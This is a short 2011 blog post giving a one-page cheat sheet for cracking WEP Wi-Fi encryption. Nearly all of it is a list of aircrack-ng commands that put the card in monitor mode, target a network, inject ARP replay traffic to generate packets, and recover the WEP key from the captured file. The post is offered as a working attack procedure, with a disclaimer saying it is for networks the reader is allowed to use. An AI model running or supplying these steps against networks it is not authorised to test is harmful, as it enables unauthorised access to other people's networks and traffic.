Search This Blog

Saturday, November 19, 2011

WEP Hacking - Single page cheat sheet

Work has been crazy lately so no time for hobbies. This post is just a summary of the commands I learned in:http://blog.workingsi.com/2011/08/playing-around-with-hacking-wep.html that I can refer to easily from my phone when working on the road. This uses backtrack penetration testing linux loaded on a USB. Computer is rebooted from the USB into backtrack linux. startx starts the environment at the prompt.  Open terminals to execute these commands:

  • airmon-ng stop wlan0
  • airmon-ng start wlan0
    • initializes the card.  wlan0 is the card name
  • airodump-ng wlan0
    • Find networks with WEP and write down channel, bssid, essid , Hit ctrl-c to stop
  • airodump-ng -w wep -c <number> --bssid <bssid> wlan0
    • points the wireless card to the network you picked
  • aireplay-ng -1 0 -a <bssid> wlan0
    • initiates association with network. comes back association successful
  • aireplay-ng -3 -b <bssid> wlan0"  
    • Makes traffic and sniffs it.  Go back to the first terminal and watch the data column, run until data hits 30,000. 
  •  dir
    •  a file will be created *.cap that will have the wireless data captured
  • aircrack-ng wep-01.cap
    • And it will return the WEP key

Disclaimer:  This is not admission that I have ever hacked WiFI, or that you should steal WiFi bandwidth.  People who use WEP networks are human too and should be respected and not harmed in any way.   Use this only for networks you are allowed to connect to.


No comments:

Post a Comment